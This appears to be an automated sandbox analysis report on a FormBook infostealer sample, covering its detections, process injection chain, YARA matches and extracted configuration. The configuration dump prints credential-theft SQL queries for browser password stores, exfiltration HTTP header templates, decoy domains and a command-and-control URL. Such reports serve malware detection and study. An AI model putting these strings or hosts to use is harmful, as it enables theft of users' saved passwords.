Play interactive tour

Edit tour

Analysis Report HOPEFUL.exe

Overview

General Information

Sample Name:	HOPEFUL.exe
Analysis ID:	339365
MD5:	9c15af175868121cc014666189d52dae
SHA1:	3ba03f47a8762368538e47806353f55da43d46ac
SHA256:	7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
Tags:	exeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

HOPEFUL.exe (PID: 6744 cmdline: 'C:\Users\user\Desktop\HOPEFUL.exe' MD5: 9C15AF175868121CC014666189D52DAE)

AddInProcess32.exe (PID: 6548 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmmon32.exe (PID: 4656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)

cmd.exe (PID: 4240 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", "eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.557782096.0000000000EC0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.558552585.0000000003090000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.342835005.00000000017B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.341874969.0000000001380000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9a58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9cd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x90138:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x903b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x9bed5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x9b9c1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9bfd7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a6f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9c14f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x90dca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1455c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9ac3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3e3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x91ac3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b497:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xa1b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c49a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.298637498.0000000004A76000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18579:$sqlite3step: 68 34 1C 7B E1 0x1868c:$sqlite3step: 68 34 1C 7B E1 0x9ec59:$sqlite3step: 68 34 1C 7B E1 0x9ed6c:$sqlite3step: 68 34 1C 7B E1 0x185a8:$sqlite3text: 68 38 2A 90 C5 0x186cd:$sqlite3text: 68 38 2A 90 C5 0x9ec88:$sqlite3text: 68 38 2A 90 C5 0x9edad:$sqlite3text: 68 38 2A 90 C5 0x185bb:$sqlite3blob: 68 53 D8 7F 8C 0x186e3:$sqlite3blob: 68 53 D8 7F 8C 0x9ec9b:$sqlite3blob: 68 53 D8 7F 8C 0x9edc3:$sqlite3blob: 68 53 D8 7F 8C
00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000013.00000002.560537897.0000000004B40000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.341186182.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa158:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa3d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15ef5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x159e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15ff7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1616f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xadea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14c5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbae3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1bb97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1cb9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.298890035.0000000004B4D000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18c79:$sqlite3step: 68 34 1C 7B E1 0x18d8c:$sqlite3step: 68 34 1C 7B E1 0x18ca8:$sqlite3text: 68 38 2A 90 C5 0x18dcd:$sqlite3text: 68 38 2A 90 C5 0x18cbb:$sqlite3blob: 68 53 D8 7F 8C 0x18de3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.AddInProcess32.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.AddInProcess32.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
5.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.AddInProcess32.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.2.AddInProcess32.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", 